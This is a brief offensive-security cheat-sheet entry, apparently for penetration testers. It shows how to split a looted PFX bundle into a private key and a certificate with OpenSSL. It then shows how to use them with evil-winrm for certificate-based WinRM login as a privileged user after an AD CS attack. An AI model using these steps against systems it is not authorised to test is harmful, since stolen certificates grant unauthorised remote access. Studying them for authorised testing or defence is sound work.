OpenSSL — Extract Key & Cert from PFX
credentialstool
Summary
When you loot a .pfx, split it into a key and certificate with OpenSSL, then use them for certificate-based WinRM auth.
Walkthrough
After looting a .pfx (PKCS#12 bundle), break it apart so the key and cert can be used for certificate-based authentication:
- Extract the private key (it comes out encrypted, then strip the passphrase).
- Extract the client certificate.
- Authenticate over WinRM with
-k key -c cert(the-Sflag enables TLS).
This is the typical follow-up after an AD CS / ESC attack where you end up with a PFX for a privileged user.
Commands
bash
# Split a .pfx into an encrypted key, then a clean key openssl pkcs12 -in auth.pfx -nocerts -out auth.key-enc openssl rsa -in auth.key-enc -out auth.key
bash
# Export the certificate openssl pkcs12 -in auth.pfx -clcerts -nokeys -out auth.crt
bash
# Authenticate over WinRM using the cert + key evil-winrm -i <IP> -S -k auth.key -c auth.crt